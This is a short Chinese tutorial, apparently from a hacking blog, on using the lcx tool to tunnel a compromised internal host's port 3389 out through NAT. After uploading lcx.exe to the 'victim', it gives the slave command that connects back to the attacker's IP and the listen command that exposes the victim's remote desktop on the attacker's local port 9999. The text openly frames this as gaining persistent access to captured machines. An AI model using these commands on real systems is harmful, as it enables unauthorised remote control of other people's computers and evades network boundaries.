lcx实现端口转发

lcx实现端口转发

概念

• 比较经典的就是lcx。简单说一下概念，首先内网中的主机一般都是使用的私有ip，在网络出口处经过NAT转换为公网ip后，才能访问internet。
• 所以，有时当我们进入网站后台cmd，或者捕获了一台内网中的肉鸡，是无法主动去链接这台肉鸡的，也不好在别人的网络出口做端口映射，这就体现lcx的作用了。
• lcx实现端口转发，将肉鸡A上的某个端口(常用的3389)，转发到具有公网地址的主机B上，这样我们只需要连接主机B的3389端口就相当于连接到了肉鸡A上，从而突破了内网私有ip的限制。

使用

攻击者ip:192.168.1.2 受害者ip:192.168.1.3

将lcx.exe上传到受害者主机上，执行：

lcx.exe -slave 192.168.1.2 8080 192.168.1.3 3389

然后攻击者主机上执行：

lcx.exe -listen 8080 9999

这样就将受害者主机的3389服务转发到攻击者本地的9999端口上了。只要攻击者访问127.0.0.1:9999就可以连接到受害者的远程桌面